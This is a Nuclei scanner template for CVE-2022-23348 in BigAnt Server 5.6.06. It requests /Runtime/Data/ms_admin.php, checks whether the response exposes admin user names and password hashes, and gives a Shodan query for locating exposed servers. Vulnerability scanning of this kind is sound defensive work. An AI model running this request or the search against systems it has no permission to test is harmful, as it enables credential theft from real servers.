nuclei-templates/cves/2022/CVE-2022-23348.yaml

39 lines
883 B
YAML
Raw Normal View History

2022-08-05 05:58:38 +00:00
id: CVE-2022-23348
info:
name: BigAnt Server v5.6.06 - Improper Access control
author: arafatansari
severity: medium
description: |
BigAnt Server v5.6.06 suffers from Use of Password Hash With Insufficient Computational Effort.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23348
- https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23348
metadata:
shodan-query: http.html:"bigant"
verified: "true"
tags: access,weak,password,cve,2022
requests:
- method: GET
path:
- "{{BaseURL}}/Runtime/Data/ms_admin.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'ServiceAdmin'
- 'user_name'
- 'user_pwd'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200